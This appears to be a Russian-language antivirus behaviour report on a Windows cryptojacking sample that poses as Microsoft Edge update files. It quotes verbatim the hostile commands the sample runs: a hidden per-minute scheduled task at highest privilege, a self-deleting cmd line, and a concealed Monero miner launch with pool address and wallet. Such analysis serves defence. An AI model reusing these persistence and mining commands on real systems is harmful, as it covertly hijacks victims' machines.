Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoftedgeupdatetaskmachinecoretask
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\winupdate32\runtimebroker.exe
- nul
Самоудаляется.
Другое
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\winupdate32\runtimebroker.exe'
Запускает на исполнение
- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "%ALLUSERSPROFILE%\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c timeout /t 5 /nobreak >nul & del "<Полный путь к файлу>" (со скрытым окном)
- '<SYSTEM32>\timeout.exe' /t 5 /nobreak
- '<SYSTEM32>\taskeng.exe' {9D3D8493-32F5-4080-B3E3-4708FDA8B9D1} S-1-5-21-3691498038-2086406363-2140527554-1000:jckxumuxea\user:Interactive:[1]
- '%ALLUSERSPROFILE%\winupdate32\runtimebroker.exe' (со скрытым окном)
- '%APPDATA%\microsoft\rtkauduservice64a.exe' -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG3 -p RIG3 --cpu-priority=0 --tls --threads=1 (со скрытым окном)
